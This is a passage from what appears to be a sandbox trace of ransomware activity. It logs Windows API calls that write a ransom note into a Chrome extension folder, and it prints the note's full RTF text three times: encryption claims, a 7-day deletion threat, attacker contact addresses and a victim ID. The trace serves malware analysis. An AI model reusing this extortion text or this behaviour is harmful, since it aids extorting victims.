returned 8717 [0288.076] WriteFile (in: hFile=0x2ec, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0288.077] CloseHandle (hObject=0x2ec) returned 1 [0288.077] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\#readme_eman#.rtf")) returned 0xffffffff [0288.077] GetLastError () returned 0x2 [0288.077] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0288.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 